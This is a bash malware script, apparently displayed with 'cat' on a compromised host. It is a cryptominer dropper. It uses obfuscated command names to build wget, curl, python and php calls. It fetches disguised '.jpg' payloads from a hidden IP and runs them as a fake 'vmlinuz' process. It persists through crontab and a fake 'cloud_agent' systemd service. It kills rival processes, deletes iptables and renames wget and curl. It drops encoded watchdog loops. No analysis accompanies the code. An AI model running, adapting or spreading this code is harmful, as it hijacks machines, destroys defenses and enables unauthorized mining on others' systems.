chaos

1. $ cat seasame
2. #!/usr/bin/env bash
3. rm -rf /tmp/.dbb
4. touch /tmp/.dbb
5. chaos=abcdefghijklmnop1234567890ABCDEFGHIJKLMNOP
6. entropy=08:232.331.83.15
7. function discord() { for i in {1..7} ; do echo -n ${chaos:RANDOM%${#chaos}:1}; done; }
8. new_bash=$(discord);_b=et;_j=ph;_l=cr;_k=p;_q=3;_t=ip;_v=bl;_u=ta;_w=es
9. new_dog=$(discord);_g=th;_i=tp;_m=ta;_d=cu;_p=2
10. new_killbot=$(discord);_c=rl;_f=on;_n=on;_r=ak
11. omelette=$(discord);_e=py;_a=wg;_o=b;_h=ht;_s=mv
12. if [ `uname -m` == "x86_64" ]; then
13. eggs=('86su.jpg' '86du.jpg' '86s.jpg' '86d.jpg' '46su.jpg' '46du.jpg' '46s.jpg' '46d.jpg')
14. else
15. eggs=('83su.jpg' '83du.jpg' '83s.jpg' '83d.jpg' '43su.jpg' '43du.jpg' '43s.jpg' '43d.jpg' 'a6u.jpg' 'a6.jpg')
16. fi
17. ketchup='*/5 * * * *'
18. pkill -18 -f [/]vmlinuz
19. omg=`ps aux | grep [/]vmlinuz | awk '{if($3>30.0) print 1}'`
20. if [ "$omg" == "1" ]; then
21. ps aux | grep -v '/boot/vmlinuz' | awk '{if($3>30.0) print $2}' | while read procid; do kill -9 $procid; done
22. exit
23. else
24. pkill -9 -f [/]vmlinuz
25. fi
26. pkill -9 -f prot
27. if [ $(command -v $_l$_n$_m$_o | wc -l) -eq 1 ]; then
28. $_l$_n$_m$_o -r &> /dev/null
29. fi
30. wp=('/tmp' '/var/tmp' '/dev/shm' `pwd`)
31. for ip in ${wp[@]}
32. do
33. cd $ip
34. rm -rf touch myself
35. cp `command -v touch` ./touch
36. ./touch ./myself
37. if [ ! -f ./myself ]; then
38. continue
39. else
40. rm -rf touch myself
41. break
42. fi
43. done
44. sysctl -w vm.nr_hugepages=128
45. for((i=0;i<${#entropy};i++)); do housewife="$housewife${entropy:~i:1}"; done
46. ( find /var/tmp -executable -type f -exec rm -f {} \; & ) &> /dev/null
47. ( find /tmp -executable -type f -exec rm -f {} \; & ) &> /dev/null
48. for egg in ${eggs[@]}
49. do
50. rm -rf $omelette
51. if [ $(command -v $_a$_b | wc -l) -eq 1 ]; then
52. $_a$_b -q "$_h$_i://$housewife/$egg" -O ./$omelette
53. if [[ $EUID -eq 0 ]]; then
54. seasame="`command -v $_a$_b`$_r -q -O /tmp/seasame $_h$_i://$housewife"
55. else
56. seasame="`command -v $_a$_b` -q -O /tmp/seasame $_h$_i://$housewife"
57. fi
58. elif [ $(command -v $_d$_c | wc -l) -eq 1 ]; then
59. $_d$_c -s "$_h$_i://$housewife/$egg" -o ./$omelette
60. if [[ $EUID -eq 0 ]]; then
61. seasame="`command -v $_d$_c`$_r -s -o /tmp/seasame $_h$_i://$housewife"
62. else
63. seasame="`command -v $_d$_c` -s -o /tmp/seasame $_h$_i://$housewife"
64. fi
65. elif [ $(command -v $_a$_b$_r | wc -l) -eq 1 ]; then
66. $_a$_b$_r -q "$_h$_i://$housewife/$egg" -O ./$omelette
67. seasame="`command -v $_a$_b$_r` -q -O /tmp/seasame $_h$_i://$housewife"
68. elif [ $(command -v $_d$_c$_r | wc -l) -eq 1 ]; then
69. $_d$_c$_r -s "$_h$_i://$housewife/$egg" -o ./$omelette
70. seasame="`command -v $_d$_c$_r` -s -o /tmp/seasame $_h$_i://$housewife"
71. elif [ $(command -v $_e$_g$_f$_p | wc -l) -eq 1 ]; then
72. $_e$_g$_f$_p -c "from urllib import urlretrieve; urlretrieve('$_h$_i://$housewife/$egg', './$omelette')"
73. seasame="`command -v $_e$_g$_f$_p` -c \"from urllib import urlretrieve; urlretrieve('$_h$_i://$housewife/', '/tmp/seasame')\""
74. elif [ $(command -v $_e$_g$_f$_q | wc -l) -eq 1 ]; then
75. $_e$_g$_f$_q -c "from urllib.request import urlretrieve; urlretrieve('$_h$_i://$housewife/$egg', './$omelette')"
76. seasame="`command -v $_e$_g$_f$_q` -c \"from urllib.request import urlretrieve; urlretrieve('$_h$_i://$housewife/', '/tmp/seasame')\""
77. elif [ $(command -v $_e$_g$_f | wc -l) -eq 1 ]; then
78. if [ $($_e$_g$_f -V 2>&1 | sed 's/.* \([0-9]\).\([0-9]\).*/\1\2/') -lt "30" ]; then
79. $_e$_g$_f -c "from urllib import urlretrieve; urlretrieve('$_h$_i://$housewife/$egg', './$omelette')"
80. seasame="`command -v $_e$_g$_f` -c \"from urllib import urlretrieve; urlretrieve('$_h$_i://$housewife/', '/tmp/seasame')\""
81. else
82. $_e$_g$_f -c "from urllib.request import urlretrieve; urlretrieve('$_h$_i://$housewife/$egg', './$omelette')"
83. seasame="`command -v $_e$_g$_f` -c \"from urllib.request import urlretrieve; urlretrieve('$_h$_i://$housewife/', '/tmp/seasame')\""
84. fi
85. elif [ $(command -v $_j$_k | wc -l) -eq 1 ]; then
86. $_j$_k -r "file_put_contents('./$omelette', fopen('$_h$_i://$housewife/$egg', 'r'));"
87. seasame="`command -v $_j$_k` -r \"file_put_contents('/tmp/seasame', fopen('$_h$_i://$housewife/', 'r'));\""
88. else
89. exit
90. fi
91. chmod 777 ./$omelette
92. nohup ./$omelette &> /dev/null
93. sleep 1
94. ./$omelette &> /dev/null
95. sleep 3
96. ps x | grep '[/]vmlinuz' &> /dev/null
97. if [ $? -eq 1 ]; then
98. continue
99. else
100. break
101. fi
102. done
103. if [ ! -d $HOME ]; then
104. new_home='HOME=/tmp/'
105. fi
106. if [ $(command -v $_l$_n$_m$_o | wc -l) -eq 1 ]; then
107. echo -e "$new_home\n$ketchup $seasame && bash /tmp/seasame" | $_l$_n$_m$_o -
108. fi
109. if [[ $EUID -eq 0 ]]; then
110. rm -rf `command -v $_t$_u$_v$_w`
111. renice -1 -p $(ps -ax | grep -i [/]vmlinuz | awk 'NR==1{print $1}')
112. if [ $(command -v $_a$_b | wc -l) -eq 1 ]; then
113. $_s `command -v $_a$_b` `command -v $_a$_b`$_r
114. fi
115. if [ $(command -v $_d$_c | wc -l) -eq 1 ]; then
116. $_s `command -v $_d$_c` `command -v $_d$_c`$_r
117. fi
118. if [ -d /etc/systemd/system/ ]; then
119. seasame="${seasame//\"/\ '\'\"}"
120. seasame="`command -v sleep` 10; $seasame; `command -v bash` /tmp/seasame"
121. cat << EOF > /etc/systemd/system/cloud_agent.service
122. [Unit]
123. Wants=network-online.target
124. After=network.target network-online.target
125.  
126. [Service]
127. Type=forking
128. ExecStart=`command -v bash` -c "$seasame"
129. TimeoutSec=0
130. RemainAfterExit=yes
131. SysVStartPriority=99
132.  
133. [Install]
134. WantedBy=multi-user.target
135. EOF
136. systemctl daemon-reload &> /dev/null
137. systemctl enable cloud_agent &> /dev/null
138. fi
139. fi
140. echo "sleep 2;rm "'$0'" ;while true;do sleep 10; ps x | grep '[/]vmlinuz' &> /dev/null ;if [ "'$?'" -eq 1 ]; then chmod 777 ./$omelette;nohup ./$omelette &> /dev/null;./$omelette &> /dev/null;fi; ps x | grep '[/]vmlinuz' | awk '{print "'$1'"}' | awk '{if(NR>1)print}' | xargs -I{} -n1 kill -9 {} &> /dev/null;done" | tee ./$new_dog &> /dev/null
141. if [ $(command -v base64 | wc -l) -eq 1 ]; then
142. echo -n 'c2xlZXAgMjtybSAkMCA7d2hpbGUgdHJ1ZTtkbyBzbGVlcCA1OyBwcyBhdXggfCBncmVwIC12ICd2bWxpbnV6JyB8IGF3ayAne2lmKCQzPjMwLjApIHByaW50ICQyfScgfCB3aGlsZSByZWFkIHByb2NpZDsgZG8ga2lsbCAtOSAkcHJvY2lkICAmPiAvZGV2L251bGw7IGRvbmU7ZG9uZQ==' | base64 -d | tee ./$new_killbot &> /dev/null
143. else
144. printf '\x73\x6c\x65\x65\x70\x20\x32\x3b\x72\x6d\x20\x24\x30\x20\x3b\x77\x68\x69\x6c\x65\x20\x74\x72\x75\x65\x3b\x64\x6f\x20\x73\x6c\x65\x65\x70\x20\x35\x3b\x20\x70\x73\x20\x61\x75\x78\x20\x7c\x20\x67\x72\x65\x70\x20\x2d\x76\x20\x27\x76\x6d\x6c\x69\x6e\x75\x7a\x27\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x69\x66\x28\x24\x33\x3e\x33\x30\x2e\x30\x29\x20\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x70\x72\x6f\x63\x69\x64\x3b\x20\x64\x6f\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x24\x70\x72\x6f\x63\x69\x64\x20\x20\x26\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x20\x64\x6f\x6e\x65\x3b\x64\x6f\x6e\x65' | tee ./$new_killbot &> /dev/null
145. fi
146. echo "while true; do sleep 1; pkill -f -9 'https://'; pkill -f -9 'http://'; pkill -9 -f 'eval'; done" | tee ./prot &> /dev/null
147. cp `command -v bash` ./$new_bash
148. ./$new_bash ./$new_dog &
149. ./$new_bash ./$new_killbot &
150. ./$new_bash ./prot &
151. exit
152. [sf@devcon001 tmp]$